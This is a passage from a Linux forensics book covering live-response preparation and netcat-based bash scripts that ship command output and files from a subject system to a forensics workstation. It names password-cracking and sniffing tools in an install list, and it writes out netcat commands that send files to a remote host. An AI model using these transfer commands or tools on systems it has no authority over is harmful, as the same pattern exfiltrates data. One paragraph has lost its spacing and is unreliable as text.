extundelete
f-spot
fdupes
flare
flasm
flex
foremost
g++
gcc
gdb
ghex
gthumb
graphviz
hexedit
htop
hydra
hydra-gtk
ipython
kdiff3
kpartx
libafflib0
libafflib-dev
libbde
libbde-tools
libesedb
libesedb-tools
libevt
libevt-tools
libevtx
libevtx-tools
libewf
libewf-dev
libewf-python
libewf-tools
libfuse-dev
libfvde
libfvde-tools
liblightgrep
libmsiecf
libnet1
libolecf
libparse-win32registry-perl
libregf
libregf-dev
libregf-python
libregf-tools
libssl-dev
libtext-csv-perl
libvshadow
libvshadow-dev
libvshadow-python
libvshadow-tools
libxml2-dev
maltegoce
md5deep
nbd-client
netcat
netpbm
nfdump
ngrep
ntopng
okular
openjdk-6-jdk
p7zip-full
phonon
pv
pyew
python
python-dev
python-pip
python-flowgrep
python-nids
python-ntdsxtract
python-pefile
python-plaso
python-qt4
python-tk
python-volatility
pytsk3
rsakeyfind
safecopy
sleuthkit
ssdeep
ssldump
stunnel4
tcl
tcpflow
tcpstat
tcptrace
tofrodos
torsocks
transmission
unrar
upx-ucl
vbindiff
virtuoso-minimal
winbind
wine
wireshark
xmount
zenity
regripper
cmospwd
ophcrack
ophcrack-cli
bkhive
samdump2
cryptcat
outguess
bcrypt
ccrypt
readpst
ettercap-graphical
driftnet
tcpreplay
tcpxtract
tcptrack
p0f
netwox
lft
netsed
socat
knocker
nikto
nbtscan
radare-gtk
python-yara
gzrt
testdisk
scalpel
qemu
qemu-utils
gddrescue
dcfldd
vmfs-tools
mantaray
python-fuse
samba
open-iscsi
curl
git
system-config-samba
libpff
libpff-dev
libpff-tools
libpff-python
xfsprogs
gawk
exfat-fuse
exfat-utils
xpdf
feh
pyew
radare
radare2
pev
tcpick
pdftk
sslsniff
dsniff
rar
xdot
ubuntu-tweak
vim"
# actually install
# first update
apt-get update
for pkg in ${pkglist}
do
  # is the package already in the list of installed packages?
  if (dpkg --list | awk '{print $2}' | egrep "^${pkg}$" 2>/dev/null) ;
  then
    echo "yeah ${pkg} already installed"
  else
    # try to install
    echo -n "Trying to install ${pkg}..."
    if (apt-get -y install ${pkg} 2>/dev/null) ; then
      echo "+++ Succeeded +++"
    else
      echo "--- FAILED ---"
    fi
  fi
done
Briefly, the above script works as described here. First, we run a particular shell (bash) using the special comment construct #!{command to run}. This is often called the “she-bang” operator or “pound-bang” or “hash-bang.” Second, the lines with the echo statements add two repositories to our list of software sources. Technically, these repositories are intended to be used with Ubuntu 14.04, but they are likely to work with newer versions of Ubuntu and/or Debian as well.
Third, a variable named pkglist is created which contains a list of the tools we wish to install. Fourth, we update our local application cache by issuing the command apt-get update. Finally, we iterate over our list of packages stored in pkglist and install them if they aren’t already installed. The test involves a string of commands, dpkg --list | awk '{print $2}' | egrep "^${pkg}$" 2>/dev/null. The command dpkg --list lists all installed packages and this list is then passed to awk '{print $2}' which causes the second word (the package name) to be printed; this is in turn passed to egrep "^${pkg}$" 2>/dev/null which checks to see if the package name exactly matches one that is installed (the ^ matches the start and $ matches the end). Any errors are sent to the null device because we only care if there were any results.
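To see why the ^ and $ anchors matter, the exact-match test can be tried on canned text instead of a live package database. This is only a sketch: the sample_list contents and the is_listed function name are made up for illustration, and grep -E is used as the equivalent of egrep.

```shell
# Sample text standing in for the output of `dpkg --list` (hypothetical data).
sample_list='ii  gcc        4:4.8.2  amd64  GNU C compiler
ii  gcc-4.8    4.8.4    amd64  GNU C compiler
ii  sleuthkit  4.1.3    amd64  forensic analysis tools'

# Succeeds only if the second column contains exactly the name given in $1.
is_listed() {
    printf '%s\n' "$sample_list" | awk '{print $2}' | grep -E "^$1\$" > /dev/null
}

is_listed gcc && echo "gcc: exact match found"
is_listed gc  || echo "gc: no match, because of the ^ and \$ anchors"
```

Without the anchors, the pattern gc would match both gcc and gcc-4.8. Keep in mind that the package name is treated as a regular expression, so a name containing characters such as + may not match itself literally.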
A set of known good system binaries should be installed to a flash drive in order to facilitate live response. At a minimum you will want the /bin, /sbin, and /lib directories (/lib32 and /lib64 for 64-bit systems) from a known good system. You may also want to grab the /usr directory or at least /usr/local/, /usr/bin, and /usr/sbin. Most Linux systems you are likely to encounter are running 64-bit versions of Linux; after all, 64-bit Linux has been available since before 64-bit processors were commercially available. It might still be worth having a 32-bit system on hand.
On occasion a live Linux system installed on a bootable USB drive could be useful. Either a distribution such as SIFT can be installed by itself on a drive or the live system can be installed on the first partition of a larger USB drive and the system binaries installed on a second partition. If you are using a USB drive with multiple partitions it is important to know that Windows systems will only see the first partition and then only if it is formatted as FAT or NTFS. Partitions containing system binaries should be formatted as EXT2, EXT3, or EXT4 in order to mount them with correct permissions. Details of how to mount these system binaries will be provided in future chapters.
THIS IS TAKING TOO LONG
Running live Linux in a virtual machine
If you decide to create a bootable SIFT (or similar) USB drive you will quickly find that it takes hours to install the packages from SIFT. This can tie up your computer for hours preventing you from getting any real work done. There is a way to build the USB drive without tying up the machine, however. What you need to do is set up a virtual machine that can be run from a live Linux distribution on a USB drive. The following instructions assume you are running VirtualBox on a Linux host system.
VirtualBox ships with several tools. One of these is called vboxmanage. There are several commands vboxmanage supports. Typing vboxmanage --help in a terminal will give you a long list of commands. This will not list the command that we need, however, as it is one of the internal commands.
In order to create a virtual disk that points to a physical device you must execute the following command as root: vboxmanage internalcommands createrawvmdk -filename <location of vmdk file> -rawdisk <USB device>. For example, if your thumb drive is normally mounted as /dev/sdb the following command could be used: vboxmanage internalcommands createrawvmdk -filename /root/VirtualBox\ Vms/usb.vmdk -rawdisk /dev/sdb. Note that you cannot just sudo this command as the regular user will have permission problems trying to run the virtual machine later. Creating this virtual drive and running VirtualBox is shown in Figure 1.3.
Once the virtual disk file has been created, set up a new virtual machine in the normal manner. Depending on the live Linux you have chosen, you may need to enable EFI support as shown in Figure 1.7. The creation of the live Linux virtual machine is shown in Figure 1.4 through Figure 1.6. The virtual machine running for the first time is shown in Figure 1.8.
FIGURE 1.3
Creating a virtual disk file that points to a physical USB drive.
FIGURE 1.4
Creating a virtual machine that runs a live Linux distribution from a USB drive.
FIGURE 1.5
Setting up memory for the live Linux virtual machine. Be certain to select the maximum amount of memory for better performance running a live distribution as everything is run from RAM.
FIGURE 1.6
Selecting the USB physical drive for the live Linux virtual machine.
FIGURE 1.7
Enabling EFI support in VirtualBox.
FIGURE 1.8
Running a virtual machine from a USB drive.
SUMMARY
In this chapter we have discussed all the preliminary items that should be taken care of before arriving on the scene after a suspected incident has occurred. We covered the hardware, software, and other tools that should be in your go bag. In the next chapter we will discuss the first job when you arrive, determining if there was an incident.
CHAPTER 2
Determining If There Was an Incident
INFORMATION IN THIS CHAPTER:
Opening a case
Talking to users
Documentation
Mounting known-good binaries
Minimizing disturbance to the subject system
Using scripting to automate the process
Collecting volatile data
OPENING A CASE
This chapter will address the highlighted box from our high-level process as shown in Figure 2.1. We will come to learn that there is often much involved in determining whether or not there was an incident. We will also see that some limited live response may be necessary in order to make this determination.
FIGURE 2.1
The High-level Investigation Process.
Before you do anything else, when you arrive on the scene, you should open a case file. This is not as complicated as it sounds. You could literally create a folder on your laptop with a case number. What should you use for a case number? Whatever you want. You might want a case number that is a year-number or you might prefer to use the date for a case number under the assumption that you won’t be starting multiple cases on the same day. You could always append a number to the date if you had multiple cases in a given day.
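The date-plus-number idea is easy to automate. The following is a minimal sketch, not a prescribed method: the function name next_case_number, the cases folder, and the YYYY-MM-DD format with a -2, -3 suffix are all assumptions chosen for illustration.

```shell
# Print a case number based on a date (YYYY-MM-DD), adding -2, -3, ... when a
# folder for that date already exists under the given parent directory.
next_case_number() {
    parent=$1
    day=$2
    candidate=$day
    n=1
    while [ -e "$parent/$candidate" ]; do
        n=$((n + 1))
        candidate="$day-$n"
    done
    echo "$candidate"
}

# Hypothetical usage: create today's case folder under ./cases
mkdir -p cases
case_number=$(next_case_number cases "$(date +%Y-%m-%d)")
mkdir "cases/$case_number"
echo "Opened case $case_number"
```

Running the usage lines twice on the same day would create a second folder with -2 appended rather than reusing the first.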
You might also consider starting a new entry in your bound notebook (with the numbered pages). Some might prefer to wait until they are sure there was an incident before consuming space in their notebooks for a false alarm. My personal feeling on this is that notebooks are cheap and it is easier and cleaner if you start taking notes in one place from the very beginning.
TALKING TO USERS
Before you ever think about touching the subject system you should interview the users. Why? Because they know more about the situation than you will. You might be able to determine that it was all a false alarm very quickly by talking to the users. For example, perhaps it was a system administrator that put a network card in promiscuous mode and not malware or an attacker. It would be far better for everyone if you found this out by talking to the administrator now than after hours of investigating.
You should ask the users a series of questions. The first question you might ask is, “Why did you call me?” Was there an event that led to your being called in? Does the organization lack a qualified person to perform the investigation? Does the organization’s policy on possible incidents require an outside investigator?
The second question you might ask is, “Why do you think there is a problem or incident?” Did something strange happen? Is the network and/or machine slower than normal? Is there traffic on unusual ports? Unlike Windows users, most Linux users don’t just shrug off strange behavior and reboot.
Next you want to get as much information as you can about the subject (suspected victim) system. What is the system normally used for? Where did the system come from? Was it purchased locally or online, etc? As many readers are likely aware, it has come to light that certain government entities are not above planting parasitic devices inside a computer that has been intercepted during shipment. Has the computer been repaired recently? If so, by whom? Was it an old, trusted friend or someone new? Malicious software and hardware are easily installed during such repairs.
DOCUMENTATION
As previously mentioned, you cannot overdo the documentation. You should write down what the users told you during your interviews. In addition to the advantages already mentioned for using a notebook, writing notes in your notebook is a lot less distracting and intimidating for the users than banging away at your laptop keyboard or, even worse, filming the interviews.
You should also write down everything you know about the subject system. If it seems appropriate you might consider taking a picture of the computer and screen. If you suspect that physical security has been breached, it is an especially good idea. You are now ready to actually touch the subject system.
VIRTUAL COMPLICATIONS
If you are using a virtual machine, older may be better
I have previously recommended the use of a USB 3.0 drive for performance reasons. If you are using a virtual machine to practice while you are going through this book, a USB 2.0 drive might be preferred. The reason for this is that some of the virtualization software seems to have issues dealing with USB 3.0 devices. At the time of this writing USB 2.0 devices seem to cause fewer problems.
Regardless of the type of drive you have, the host operating system will initially try to lay claim to any attached device. If you are using VirtualBox, you will need to check the appropriate device from the USB Devices submenu under Devices as shown in Figure 2.2.
FIGURE 2.2
Selecting a USB Drive. If your subject system is running inside a virtual machine you will need to pass the device along to the virtual machine by selecting the device as shown here.
MOUNTING KNOWN-GOOD BINARIES
In most cases if you insert your USB drive with known-good binaries, it will be automounted. If this isn’t the case on the subject system, you will need to manually mount the drive. Once your drive is mounted you should run a known-good shell located on your drive. You are not done after you run this shell, however. You must set your path to only point at the directories on your USB drive and also reset the LD_LIBRARY_PATH variable to only reference library directories on the USB drive.
The first thing you will want to do is to check that your filesystem has in fact been mounted. Some versions of Linux will not automatically mount an extended (ext2, ext3, or ext4) filesystem. Most Linux systems will automount a FAT or NTFS filesystem, however. Recall that your system binaries must be housed on an extended filesystem in order to preserve their permissions. The easiest way to check if something is mounted is to execute the mount command. The results of running this command with my Linux forensics response drive are shown in Figure 2.3. Notice that my drive is mounted as /dev/sdb with three partitions. The first two partitions are a FAT and ext4 partition for a live version of Linux (SIFT in this case) and the third partition contains 64-bit system binaries.
FIGURE 2.3
Verifying That a USB Drive Is Mounted. In this figure the three highlighted partitions from the USB drive (/dev/sdb) have all been automatically mounted.
If you are unsure what drive letter will be assigned to your incident response drive the dmesg command can often help. The results of running dmesg after inserting a USB drive are shown in Figure 2.4. The portion that demonstrates the drive has been assigned to /dev/sdb is highlighted.
FIGURE 2.4
Result of running dmesg command. The portion that shows drive letter /dev/sdb has been assigned is highlighted.
If you need to manually mount your drive, first create a mount destination by running sudo mkdir /mnt/{destination}, e.g. sudo mkdir /mnt/good-bins or similar. Now that a destination exists the drive can be mounted using sudo mount /dev/{source partition} /mnt/{destination}, e.g. sudo mount /dev/sdb1 /mnt/good-bins.
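Checking whether a partition is already mounted before mounting it by hand can be reduced to a one-line test on the output of mount. The sketch below is an illustration only: device_is_mounted is a hypothetical helper, and the sample text stands in for real mount output so the logic can be tried anywhere.

```shell
# Succeeds if the device in $1 appears as the first field of mount-style
# output supplied on standard input (for example, the output of `mount`).
device_is_mounted() {
    awk -v dev="$1" '$1 == dev { found = 1 } END { exit !found }'
}

# Hypothetical usage on a live system (device and mount point are examples):
#   mount | device_is_mounted /dev/sdb1 || sudo mount /dev/sdb1 /mnt/good-bins
sample='/dev/sda1 on / type ext4 (rw,errors=remount-ro)
/dev/sdb1 on /media/user/LIVE type vfat (rw,nosuid,nodev)'
printf '%s\n' "$sample" | device_is_mounted /dev/sdb1 && echo "/dev/sdb1 is mounted"
printf '%s\n' "$sample" | device_is_mounted /dev/sdb3 || echo "/dev/sdb3 is not mounted"
```

On a subject system the awk used here should of course be the known-good copy from the response drive.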
Once everything is mounted change to the root directory for your known-good binaries and then run bash by typing exec bin/bash as shown in Figure 2.5. Once the known-good shell is loaded the path must be reset to only point to the response drive by running export PATH=$(pwd)/sbin:$(pwd)/bin as shown in Figure 2.6. Here we are using a shell trick. If you enclose a command in parentheses that are preceded by a $ the command is run and the results are substituted. Finally, the library path must also be set to point to known-good library files by running export LD_LIBRARY_PATH=$(pwd)/lib64:$(pwd)/lib as shown in Figure 2.7. If you have also copied some of the directories under /usr (recommended) then these paths should also be included in the PATH and LD_LIBRARY_PATH.
FIGURE 2.7
Making the library path point to known-good files.
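When directories under /usr have also been copied to the response drive, typing the full PATH and LD_LIBRARY_PATH by hand gets tedious. One possible approach, sketched here under the assumption that the drive mirrors the usual directory layout, is a small helper (the name build_path is hypothetical) that keeps only the directories that actually exist on the drive.

```shell
# Join the directories that actually exist under a root into a colon-separated
# list. $1 is the root of the known-good binaries; remaining arguments are
# subdirectories to consider, in order.
build_path() {
    root=$1
    shift
    result=
    for sub in "$@"; do
        if [ -d "$root/$sub" ]; then
            result="${result:+$result:}$root/$sub"
        fi
    done
    echo "$result"
}

# Hypothetical usage after changing to the root of the response drive:
#   export PATH=$(build_path "$(pwd)" sbin bin usr/sbin usr/bin usr/local/bin)
#   export LD_LIBRARY_PATH=$(build_path "$(pwd)" lib64 lib usr/lib64 usr/lib)
```

The helper relies only on shell built-ins, so it still works after PATH has been restricted to the response drive.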
MINIMIZING DISTURBANCE TO THE SUBJECT SYSTEM
Unfortunately, it is impossible to collect all the data from a running system without causing something to change. Your goal as a forensic investigator should be to minimize this disturbance to the subject system. There are two things you should never do if you can avoid it. First, do not install anything on the subject system. If you install new software it will substantially change the system when configuration files, libraries, and executables are saved to the subject’s media. The worst possible situation would be to compile something from source code as it will cause many temporary files to be created and will also consume memory (possibly pushing out other more interesting information) and affect a memory image should you choose to make one.
The second thing you should avoid is creating new files on the system. If you must use a tool that is not installed, have it on your response USB drive. Don’t create memory or disk images and then store them on the subject system either!
You will definitely alter what is in RAM when you investigate a system. You should try to minimize your memory footprint, however. There are a couple of ways that you might accomplish these goals. Two popular solutions are to store data on USB media (which could be your response drive) or to use the netcat utility.
Using a USB drive to store data
Attaching a USB drive to the subject system is minimally invasive. This will cause some new entries in a few temporary pseudo filesystems such as /proc and /sys and the creation of a new directory under /media on most versions of Linux. A few larger USB 3.0 backup drives should be in your toolkit for just such occasions. It might be best to copy your system binaries to this drive first should you end up going this route to avoid having to mount more than one external drive.
Once the USB drive has been attached you can use the techniques described earlier to operate with known-good system binaries and utilities. Log files and other data discussed in this chapter can be stored to the USB drive. Techniques described in later chapters can be used to store images on the USB drive. Even if you used the netcat utility (described next), having some USB backup drives on hand can make sharing images much easier. Naturally, whatever you do should be documented in your bound notebook.
Using Netcat
While using a USB drive meets our goals of not installing anything or creating new files on the subject system (with the exceptions noted above) it does not minimize our memory footprint. Copying to slow USB storage devices (especially USB 2.0 drives) is likely to result in a significant amount of caching which will increase our memory footprint. For this reason, the use of netcat is preferred when the subject system is connected to a network of reasonable speed and reliability.
Wired gigabit Ethernet is the most desirable media. If you are forced to use wireless networking, do your best to ensure your forensics workstation has a strong signal from the access point. If neither of these is an option, you may be able to connect your forensics laptop directly to the subject system via a crossover cable.
Realize that the subject system is probably set up to use Dynamic Host Configuration Protocol (DHCP) so you will either need to use static IP addresses on both ends or install a DHCP server on your forensics laptop if you go the crossover cable route. If the subject system has only one network interface that must be disconnected I recommend against using the crossover cable as it will disturb the system too much. To temporarily set up a static IP on each end of your crossover cable issue the command sudo ifconfig {interface} down && sudo ifconfig {interface} {IP} netmask {netmask} up, e.g. sudo ifconfig eth0 down && sudo ifconfig eth0 192.168.1.1 netmask 255.255.255.0 up. Make sure you give each end a different IP on the same subnet!
Setting up a netcat listener
You will need to set up one or more listeners on the forensics workstation. The syntax for setting up a listener is pretty simple. Typing netcat -l {port} will cause a listener to be created on every network interface on the machine. Normally this information should be stored in a file by redirecting netcat’s output using > or >>. Recall that the difference between > and >> is that > causes an existing file to be overwritten and >> appends data if the file already exists.
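The difference between the two redirection operators is worth seeing once before trusting a log file to them. This short demonstration uses a temporary file and plain echo in place of netcat output; the variable names are arbitrary.

```shell
log=$(mktemp)
echo "first entry"  >  "$log"   # > creates the file or overwrites it
echo "second entry" >> "$log"   # >> appends to whatever is already there
lines_after_append=$(($(wc -l < "$log")))

echo "third entry"  >  "$log"   # overwrites: the earlier entries are gone
lines_after_overwrite=$(($(wc -l < "$log")))

echo "lines after >>: $lines_after_append, lines after >: $lines_after_overwrite"
rm -f "$log"
```

For a case log that several commands write to, >> is the safer choice because an accidental rerun cannot wipe out earlier entries.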
I recommend that you create a listener on the forensics workstation that receives the output of all the commands you wish to run on the subject system in a single log file. This keeps everything in one place. By default netcat will terminate the listener upon receiving the end-of-file (EOF) marker. The -k option for netcat will keep the listener alive until you press Control-C in the terminal where you started netcat. The command to start the log file listener is netcat -k -l {port} >> {log file}, e.g. netcat -k -l 9999 >> example-log.txt. This command is shown in Figure 2.8. Note that while I have used netcat here this is a symbolic link to the same program pointed to by nc on most systems, so you can use whichever you prefer.
FIGURE 2.8
Running a netcat listener on the forensics workstation.
Sending data from the subject system
Now that you have a listener on the forensics workstation it is easy to send data across the network using netcat. The general sequence for sending something for logging is {command} | nc {forensic workstation IP} {port}. For commands that do not have output that makes it obvious what was run you might want to send a header of sorts using the echo utility before sending the output of the command. This is demonstrated in Figure 2.9. The results of running the commands shown in Figure 2.9 are shown in Figure 2.10. Using scripting to automate this process is discussed later in this chapter.
FIGURE 2.9
Using netcat to send information to the forensics workstation.
FIGURE 2.10
Results received by listener from commands in Figure 2.9.
Sending files
It is not unusual to extract suspicious files from a subject system for further study. Netcat is also handy for performing this task. In order to receive a file you should start a new listener on the forensics workstation that doesn’t use the -k option. In this case you want to end the listener after the file has been transmitted. The command is nc -l {port} > {filename}.
On the subject system the suspect file is redirected into the netcat talker. The syntax for sending the file is nc {forensic workstation IP} {port} < {filename}, e.g. nc 192.168.1.119 4444 < /bin/bash. The listener and talker for this file transfer are shown in Figure 2.11 and Figure 2.12, respectively.
FIGURE 2.11
Setting up a netcat listener to receive a file.
FIGURE 2.12
Using netcat to send a file.
USING SCRIPTING TO AUTOMATE THE PROCESS
It should be fairly obvious that our little netcat system described above is ripe for scripting. The first question one might ask is what sort of scripting language should be used. Many would immediately jump to using Python for this task. While I might like to use Python for many forensics and security tasks, it is not the best choice in this case.
There are a couple of reasons why shell scripting is a better choice, in my opinion. First, we want to minimize our memory footprint, and executing a Python interpreter runs counter to that goal. Second, a Python script that primarily just runs other programs is somewhat pointless. It is much simpler to execute these programs directly in a shell script. As an additional bonus for some readers, the scripts described here constitute a nice introduction to basic shell scripting.
Scripting the server
The scripts shown below will create a new directory for case files and start two listeners. The first listener is used to log commands executed on the subject (client) machine and the second is used to receive files. A script to clean up and shut down the listeners is also presented. Here is the main script, start-case.sh:
#!/bin/bash
#
# start-case.sh
#
# Simple script to start a new case on a forensics
# workstation. Will create a new folder if needed
# and start two listeners: one for log information
# and the other to receive files. Intended to be
# used as part of initial live response.
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.
usage () {
  echo "usage: $0 <case number>"
  echo "Simple script to create case folder and start listeners"
  exit 1
}
if [ $# -lt 1 ] ; then
  usage
else
  echo "Starting case $1"
fi
# if the directory doesn't exist create it
if [ ! -d $1 ] ; then
  mkdir $1
fi
# create the log listener
`nc -k -l 4444 >> $1/log.txt` &
echo "Started log listener for case $1 on $(date)" | nc localhost 4444
# start the file listener
`./start-file-listener.sh $1` &
This script starts with the special comment “#!” also known as the she-bang which causes the bash shell to be executed. It is important to run a particular shell as users who are allowed to pick their own might select something incompatible with your script. A # anywhere on a line begins a comment which terminates at the end of the line. The first several lines are comments that describe the script.
After the comments a function called usage is defined. To define a function in a shell script simply type its name followed by a space, empty parentheses, another space, and then enclose whatever commands make up the function in curly brackets. Unlike compiled languages and some scripting languages, shell scripts require white space in the proper places or they will not function correctly. The $0 in the line echo "usage: $0 <case number>" is a variable that is set to the first command line parameter that was used to run the script, which is the name of the script file.
Note the use of double quotes in the echo commands. Anything enclosed in double quotes is expanded (interpreted) by the shell. If single quotes are used, no expansion is performed. It is considered a good programming practice to define a usage function that is displayed when a user supplies command line arguments that do not make sense.
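The effect of the two kinds of quotes is easiest to appreciate side by side. In this small illustration the variable names and the sample case name are arbitrary.

```shell
case_name="2015-07-01"
double="Starting case $case_name"   # double quotes: $case_name is expanded
single='Starting case $case_name'   # single quotes: the text is kept literally
echo "$double"
echo "$single"
```

The first echo prints the case name, while the second prints the characters $case_name exactly as typed.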
The line if [ $# -lt 1 ] ; then begins an if block. The logical test is enclosed in square brackets. Note that there must be white space around the brackets and between parts of the logical test as shown. The variable $# is set to the number of command line arguments passed in to the script. In this script if that number is less than 1, the usage function is called, otherwise a message about starting a case is echoed to the screen. The variable $1 is the first command line parameter passed in (right after the name of the script) which is meant to be the case name. Observe that the if block is terminated with fi (if spelled backwards).
The conditional statement in the if block that starts with if [ ! -d $1 ] ; then checks to see if the case directory does not yet exist. The -d test checks to see that a directory with the name that follows exists. The ! negates (reverses) the test so that the code inside the if block is executed if the directory doesn’t exist. The code simply uses mkdir to create the directory.
Next the line `nc -k -l 4444 >> $1/log.txt` & starts a listener on port 4444 and sends everything received to a file in the case directory named log.txt. Note the command is enclosed in backticks (backward single quotes). This is command substitution, the older spelling of $(), and it tells the shell to run the enclosed command. The & causes the command to be run in the background so that more things may be executed.
The next line simply echoes a banner which is piped to the listener in order to create a header for the log file. Finally, another script is also run in the background. This script starts the file listener process. This script is described next.
#!/bin/bash
#
# start-file-listener.sh
#
# Simple script to start a new file
# listener. Intended to be
# used as part of initial live response.
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.
# When a filename is sent to port 5555 a transfer on 5556
# is expected to follow.
usage () {
  echo "usage: $0 <case name>"
  echo "Simple script to start a file listener"
  exit 1
}
# did you specify a case name?
if [ $# -lt 1 ] ; then
  usage
fi
while true
do
  filename=$(nc -l 5555)
  nc -l 5556 > $1/$(basename $filename)
done
This script starts with the standard she-bang which causes the bash shell to be used. It also defines a usage function which is called if a case name is not passed in to the script. The real work in this script is in the while loop at the end. The line while true causes an infinite loop which is only exited when the user presses Control-C or the process is killed. Note that unlike the if block which is terminated with fi, the do block is terminated with done (not od).
The first line in the loop runs a netcat listener on port 5555 and sets the filename variable equal to whatever was received on this port. Recall that we have used this trick of running a command inside of $() to set a variable equal to the command results in the previous script. Once a filename has been received a new listener is started on port 5556 (nc -l 5556 on the next line) and the results directed to a file with the same name in a directory named after the case name (> $1/$(basename $filename) on the second half of the line). The first command line argument, which should be the case name, is stored in $1. The basename command is used to strip away any leading path for a file that is sent.
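The role of basename can be checked in isolation. In this sketch a temporary directory stands in for the case directory and the filename is simply assigned rather than received over the network; both are assumptions made so the example runs anywhere.

```shell
case_dir=$(mktemp -d)        # stands in for the case directory ($1 in the script)
filename="/bin/bash"         # what a client might send on the filename port
destination="$case_dir/$(basename "$filename")"
echo "would save to: $destination"
rmdir "$case_dir"
```

Because the leading path is stripped, a file sent as /bin/bash lands directly in the case directory as bash rather than in a bin subdirectory that may not exist.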
Once a file has been received, the infinite loop starts a new listener on port 5555 and the cycle repeats itself. The loop exits when the cleanup script, to be described next, is executed. The client side scripts that send log information and files will be discussed later in this chapter.
#!/bin/bash
#
# close-case.sh
#
# Simple script to shut down listeners.
# Intended to be used as part of initial live response.
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.
echo "Shutting down listeners at $(date) at user request" | nc localhost 4444
killall start-case.sh
killall start-file-listener.sh
killall nc
This is our simplest script yet. First we echo a quick message to our log listener on port 4444, then we use the killall utility to kill all instances of our two scripts and netcat. If you are wondering why we need to kill netcat since it is called by the scripts, recall that in some cases it is run in the background. Also, there could be a hung or in-process netcat listener or talker out there. For these reasons it is safest just to kill all the netcat processes.
Scripting the client
Now that we have a server (the forensics workstation) waiting for us to send information, we will turn our attention toward scripting the client (subject system). Because it would be bothersome to include the forensics workstation IP address and ports with every action, we will start by setting some environment variables to be used by other client scripts. A simple script to do just that follows.
# setup-client.sh
#
# Simple script to set environment variables for a
# system under investigation. Intended to be
# used as part of initial live response.
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.
usage () {
  echo "usage: source $0 <forensics workstation IP> [log port] [filename port] [file transfer port]"
  echo "Simple script to set variables for communication to forensics workstation"
}
# did you specify the forensics workstation IP?
if [ $# -lt 1 ] ; then
  usage
  # return rather than exit: this script is sourced, and
  # exit would close the shell that sourced it
  return 1
fi
export RHOST=$1
if [ $# -gt 1 ] ; then
  export RPORT=$2
else
  export RPORT=4444
fi
if [ $# -gt 2 ] ; then
  export RFPORT=$3
else
  export RFPORT=5555
fi
if [ $# -gt 3 ] ; then
  export RFTPORT=$4
else
  export RFTPORT=5556
fi
Notice that there is no she-bang at the beginning of this script. Why not? Recall that you want to run your known-good version of bash, not the possibly vandalized one in the /bin directory. Another reason this script is she-bang free is that it must be sourced in order for the exported variables to be available in new processes in your current terminal. This is done by running the command source ./setup-client.sh {forensics workstation IP} in a terminal.
The script repeatedly uses the export command which sets a variable and makes it available to other processes in the current terminal or any child processes of the current terminal. Variables that are not exported are only visible within the process that created them and we create a new process each time we type bash {script name}. Setting these values would be pointless if they were never seen by the other client scripts. Since the server IP address is required, we store it in the RHOST variable. Then we check to see if any of the optional parameters were supplied; if not we export a default value, if so we export whatever the user entered.
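The visibility rule for exported variables can be confirmed with a child shell. The variable names LOCAL_ONLY and SHARED below are invented for this demonstration, and sh -c is used only as a convenient way to start a new process.

```shell
unset LOCAL_ONLY                 # make sure nothing was inherited from the environment
LOCAL_ONLY="not exported"
export SHARED="exported"

# A child shell sees only the exported variable.
child_view=$(sh -c 'echo "LOCAL_ONLY=${LOCAL_ONLY:-<unset>} SHARED=${SHARED:-<unset>}"')
echo "$child_view"
```

The child reports LOCAL_ONLY as unset, which is exactly what would happen to RHOST and the port variables in the other client scripts if they were not exported.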
Thefollowingscriptwillexecuteacommandandsendtheresultswrappedinaheaderandfootertotheforensicsworkstation.Aswiththepreviousscript,thereisnoshe-bangandyoumustexplicitlyrunthescriptbytypingbash./send-log.sh{commandwitharguments}.#send-log.sh
#
# Simple script to send a new log entry
# to listener on forensics workstation. Intended to be
# used as part of initial live response.
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.
# defaults primarily for testing
[ -z "$RHOST" ] && { export RHOST=localhost; }
[ -z "$RPORT" ] && { export RPORT=4444; }
usage () {
  echo "usage: $0 <command or script>"
  echo "Simple script to send a log entry to listener"
  exit 1
}
# did you specify a command?
if [ $# -lt 1 ] ; then
  usage
else
  echo -e "++++ Sending log for $@ at $(date) ++++\n$($@)\n---end---\n" | nc $RHOST $RPORT
fi
The script starts out with a couple of lines that will set RHOST and RPORT to default values if they have not already been set. These lines demonstrate a powerful technique to use in your shell scripts known as short circuiting. The line [ -z "$RHOST" ] && { export RHOST=localhost; } consists of two statements separated by the logical AND operator. The first half tests the RHOST environment variable to see if it is zero length (null or unset). Notice that the variable, complete with the leading $, is enclosed in double quotes. This forces the shell to interpret this value as a string for the test to work as expected. If the statement doesn't evaluate to true there is no reason to bother with the second half of the line, so it is skipped (short circuited). The curly brackets in the second half are used to explicitly group everything together in a statement.
NOT JUST FOR SCRIPTS
Short circuiting is useful in many places
Short circuiting isn't just for scripts. It can be useful when you have a series of commands that might take a while to run when each command depends on the success of the command before it. For example, the command sudo apt-get update && sudo apt-get -y upgrade will first update the local software repository cache and then upgrade any packages that have newer versions. The -y option automatically says yes to any prompts. If you are unable to connect to your repositories for some reason, the upgrade command is never executed.
Another common use of this technique is building software from source when you do not want to sit around and wait to see if each stage completes successfully. Many packages require a configure script to be run that checks dependencies and optionally sets some non-default options (such as library and tool locations), followed by a make and sudo make install. It can take some time for all three stages to complete. The command ./configure && make && sudo make install can be used to do this all on one line.
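Short circuiting is easy to try out in a terminal. The sketch below uses made-up variable names (DEMO_HOST and DEMO_PORT) and a directory name assumed not to exist; it shows the AND form used in the client scripts and, as an aside, the matching OR form.

```shell
# Sketch of short circuiting; DEMO_HOST and DEMO_PORT are hypothetical names.
DEMO_HOST=""        # empty, so the default below is applied
DEMO_PORT=9999      # already set, so the default below is skipped

# AND form: the right side runs only when the test on the left succeeds.
[ -z "$DEMO_HOST" ] && { export DEMO_HOST=localhost; }
[ -z "$DEMO_PORT" ] && { export DEMO_PORT=4444; }
echo "host=$DEMO_HOST port=$DEMO_PORT"

# OR form: the right side runs only when the left side fails.
[ -d /nonexistent-demo-dir ] || echo "directory missing, so the second half ran"
```

The first echo prints host=localhost port=9999, showing that only the empty variable received its default.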
The only real work done in this script is in the echo line near the bottom. We have already seen the echo command, but there are a few new things on this line. First, echo has a -e option. This option enables interpretation of backslash escapes, which allows us to put newlines (\n) in our string in order to produce multiple lines of output with a single echo command.
There are a couple of reasons why we want to use a single echo command here. First, we will be passing (piping actually) the results to the netcat talker which will send this data to our forensics workstation. We want this done as one atomic transaction. Second, this allows a more compact and easily understood script.
